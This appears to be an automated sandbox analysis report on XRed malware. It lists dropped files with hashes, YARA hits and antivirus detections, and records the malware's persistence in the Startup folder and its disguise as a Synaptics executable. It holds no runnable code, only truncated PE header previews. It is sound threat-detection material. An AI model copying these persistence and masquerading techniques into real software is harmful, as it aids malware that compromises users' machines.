                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.9.2.<./.P.i.

                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE5D.tmp.xml

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4580
                                                                                                                            Entropy (8bit):4.449212767313466
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:cvIwWl8zsBJg77aI9D7nsWpW8VYRYm8M4JFFF7El+q8Z8JZpd:uIjfTI7xF7VhJqlVJZpd
                                                                                                                            MD5:0D0FB692225158DB431399FA7FE98A02
                                                                                                                            SHA1:4B7BCFD7764FFC7CE4E2F71635625FA295A40044
                                                                                                                            SHA-256:29B5CDCB7BF38A4D1748058B8CC97F27ADDB1A518F4F840F3CFEFEAA54365CAA
                                                                                                                            SHA-512:346BDD9A025B549212CDE2B5DB22BD656715C770CE2CCD06DA8193C3AEA10C43069C0945E21407BBCC9240DCF7114F3321B428A203FAE5581D72157711EC2280
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653872" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                            C:\ProgramData\Synaptics\RCX8AC4.tmp

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):771584
                                                                                                                            Entropy (8bit):6.632118854531729
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ITr:ansJ39LyjbJkQFMhmC+6GD98
                                                                                                                            MD5:84A6CCB0838DA0E05CC6763275C2EE1C
                                                                                                                            SHA1:E2F47601FCAD62183937567210B5062B0750FA70
                                                                                                                            SHA-256:5A2B9944F9C900ABFBBF22B605A6D1770FC3C75456FFF3C0517CAA102C5D8F07
                                                                                                                            SHA-512:063E5F2432DE4D24E6BE92BD50B0E12E12DDB030615809994EE64551E8D03391C807FEE2D95EACF7669BA816981FA9ABF3A4A7B8574AE0634BEB670F015A031C
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX8AC4.tmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX8AC4.tmp, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: FGNEBI.exe, Detection: malicious, Browse
                                                                                                                            • Filename: LWQDFZ.exe, Detection: malicious, Browse
                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                            C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1691136
                                                                                                                            Entropy (8bit):7.465728800629642
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:gnsJ39LyjbJkQFMhmC+6GD9YhloDX0XOf4tHzneKlVLaqueI0psAzrcP39h:gnsHyjtk2MYC5GDyhloJfaelV6skAfX
                                                                                                                            MD5:1585CB2963DCEB92FBCF6C4C057E191E
                                                                                                                            SHA1:2063F45E9C82553BBC41CB4BC8E10B2D06D701C9
                                                                                                                            SHA-256:67D5FC80B6BF87EB6BC3D505B0102CFDF8E8727D3DA004D982467AB08DED7F0B
                                                                                                                            SHA-512:88475B49D4299519B978711B16E0EA40579A3B671EB898D3D3F8391FBC2DE55665BC0A978A20578A4C83F6BF3894A857E4013F34B0E2E4DB6DE404F66EF9CE47
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: FGNEBI.exe, Detection: malicious, Browse
                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................0...................@..............................B*......0%...................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0%.......&..................@..P....................................@..P........................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1691136
                                                                                                                            Entropy (8bit):7.465728800629642
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:gnsJ39LyjbJkQFMhmC+6GD9YhloDX0XOf4tHzneKlVLaqueI0psAzrcP39h:gnsHyjtk2MYC5GDyhloJfaelV6skAfX
                                                                                                                            MD5:1585CB2963DCEB92FBCF6C4C057E191E
                                                                                                                            SHA1:2063F45E9C82553BBC41CB4BC8E10B2D06D701C9
                                                                                                                            SHA-256:67D5FC80B6BF87EB6BC3D505B0102CFDF8E8727D3DA004D982467AB08DED7F0B
                                                                                                                            SHA-512:88475B49D4299519B978711B16E0EA40579A3B671EB898D3D3F8391FBC2DE55665BC0A978A20578A4C83F6BF3894A857E4013F34B0E2E4DB6DE404F66EF9CE47
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exe, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exe, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: FGNEBI.exe, Detection: malicious, Browse
                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................0...................@..............................B*......0%...................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0%.......&..................@..P....................................@..P........................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Local\Temp\1djgtud.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2601364168276685
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0LDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+g+pAZewRDK4mW
                                                                                                                            MD5:302BFB42032608AD4DF63BF2516CAD81
                                                                                                                            SHA1:9E1BAD83D5642FA69B3033FB8127453FAD5BE820
                                                                                                                            SHA-256:CD1E7E230FA77F55D81E64A2ECA7B89526493CB18A257C83ACF3C327F6F6AC18
                                                                                                                            SHA-512:266517CF85161E9A9FD2E6C4F9250A3D18E6F092C5F5C03F2152FF5BA60A471F427816456A330D29A78399DF0CDA83F663F4AA5397D6509AE301D25F60498305
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pNXh4ff5C7uF1DF_lrCJlQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\1kZOSEW.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2673886150881195
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0gSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+n+pAZewRDK4mW
                                                                                                                            MD5:72D12B7D3F7286E3490FB0F66100F5AA
                                                                                                                            SHA1:EFAEA122DF8CB1D4A7DE19DD54288E3CB7E9DCE8
                                                                                                                            SHA-256:DB784382B5F724336DDD568506CF3F160B1F3F65A4917F00B5892C57219A0730
                                                                                                                            SHA-512:C920D3950183AA2502691110E9C69A383E9717315306AD68B36C8591A7F5A96B0F7473C4F5DF5F5A66E5A3B1974BA24D06148DF021D525D90B1FCC00123DA6F6
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UVbVv8Whu3GKpuULCnuOWw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\2ZBVyh9.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.254666136293894
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+00UwDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1UQ+pAZewRDK4mW
                                                                                                                            MD5:7E57319DE103789C4EE02172648263BE
                                                                                                                            SHA1:49017BA7DEE5C6C9142811028E7B60F50F8E33A8
                                                                                                                            SHA-256:995164EC16E9F10BED4F597CF30F6EC6949139AD74DACF480F15811425F04761
                                                                                                                            SHA-512:28221594A88D8BD89D32710331331B7916AA066E34F1026849B26B324787A5B57C078F505C154820450C0F3DBFF0EA084FE157B9368F8FA93AEFE8D56BE91962
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4nrt81EY80YQgYjIcmzysw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\3U1Go1h.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.27183796886492
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0obSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+F+pAZewRDK4mW
                                                                                                                            MD5:519C719234962155E1C65C51733EEDB7
                                                                                                                            SHA1:4ADF5229997FA6E1C67628758B6CFBE9E59D1749
                                                                                                                            SHA-256:6873CE82BD3346E922AB46FF49F26B7EEE51EF55F0967D27D6D7AFC62A5A2F7F
                                                                                                                            SHA-512:B6DF0120CA910CBEB7718BE6676C1A2C62642C1A43E3042330EC9E9F0A8C6366ECDEB65D08AE6579FB00C4950B021722A8ECCCF597F77CF04CF66DF61C3CD627
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kkfvwjsLcX4B0Y9MZMPLKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\3ZQSdDL.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.274837505603518
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+05OeWOGDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+oLiD+pAZewRDK4mW
                                                                                                                            MD5:3FF28041E0E1680B9C083EA47A1025EC
                                                                                                                            SHA1:0DE9363818D8EF9EF5D2576260B70B460BEDE0E1
                                                                                                                            SHA-256:953007217A5F944F9741D53BF3C85D978DC13B9EF0EA904D061218FA262141BA
                                                                                                                            SHA-512:A840643EF4597E120CB086317FE08B506710D70B132936A7EB1F12AD7499D317B0EE22E7318500EFB9EE3895F65D1A5D9194A4630C0FE3884051DE0E4BD56E93
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pbrLFWNxSCJoAO0ZYUvpHQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\3qZ6Iig.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2693139287120125
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0+SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p+pAZewRDK4mW
                                                                                                                            MD5:6619646DF2EF6C2E5C41D9CB73E8116A
                                                                                                                            SHA1:8FAC8CD10F71ED7C4D5A7B6882513210CAA349EC
                                                                                                                            SHA-256:27D981893AE3BBF2B8C34E84321E0B83E272B30484CC56B19A684D9CCEB98C45
                                                                                                                            SHA-512:8469079C6D020570DE5910DDBB29BC6F8EEACFCAE3FD8A5ECD2D57140FB576419FC88B51572A597361D2FC56820A18A13ECE77AA34B17BE69D75E2C11A66F25D
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_vOnOfOHG7AhfPA3-OYAGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\576pYle.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.263062440720614
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0ZWdXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+GoX+pAZewRDK4mW
                                                                                                                            MD5:386A1B413FA59F248E2CDC9918E3299E
                                                                                                                            SHA1:FAAA0CF1A823B56A8B9BA6DEA37B45525D6ED7B0
                                                                                                                            SHA-256:D434CCF4CD6302329055C2AF7076B3E0D0CA41EDF6C9E98E9D6E0CAA75B00A94
                                                                                                                            SHA-512:0804A223FC00B281115F7AE5D2C712A19CC55F202C872A4E7315894E8A06E188CCE26B27EB205E1679806F8CC1016D4963FD0384642C5282C2E2A3CD2FF11E59
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5qVHZEwawRu2n5ZOdx5SGQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\7w8Ps3E.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.265596960806274
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+00SSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+o+pAZewRDK4mW
                                                                                                                            MD5:10B617745C2F1FF29A701BAD43CB9681
                                                                                                                            SHA1:068D0F72AEA892C5F96AF766D60AF79E3016E272
                                                                                                                            SHA-256:84E1D8689CA86E06BA45B17977BAEAC04585F553BBB83F2DB8923D959CF7F566
                                                                                                                            SHA-512:3CB891B9C543516EDC1279C8C18E7737A6D0FAD0F1239D7D9673E51515E97872D7C9B2762EAB75CE9F573B4B25F8DC71DE4EE565BDD4C16FEBF1193C9F942C0C
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rkuQ6tPq3jDLIer4Jj5Idw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\8UZVey3.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.262658822756471
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+05DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+KD+pAZewRDK4mW
                                                                                                                            MD5:D4F8AFB92C5924C4F9B7A293F7676453
                                                                                                                            SHA1:D625D5A759A09046856AB2E75EDA198889AD2AAC
                                                                                                                            SHA-256:1D1C83E10363CC1BD94C8AC6DDB0698621EF052D12CCD244F8D722D1556F6512
                                                                                                                            SHA-512:116A9AB7417EB746B7938B7D7D522F87405AF405088B2689D9087AC14063FB9F5BC9FF8416A90B37F5E403514BD7B21536294283566A7869A39239B69F9A8D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uASA4u3stjkNt-CePqwGOw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\9PDPIY5.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.254957553921911
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0CLzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X+pAZewRDK4mW
                                                                                                                            MD5:5F67EC95D5D61CA40DD2F7594A8273B8
                                                                                                                            SHA1:B440BBA587A3DD978895F8E23A3FDC489937881C
                                                                                                                            SHA-256:AF4E4732DED12554CEC51E299F4068DE7FF29322DD54C69DA35A8FD68F54E3B2
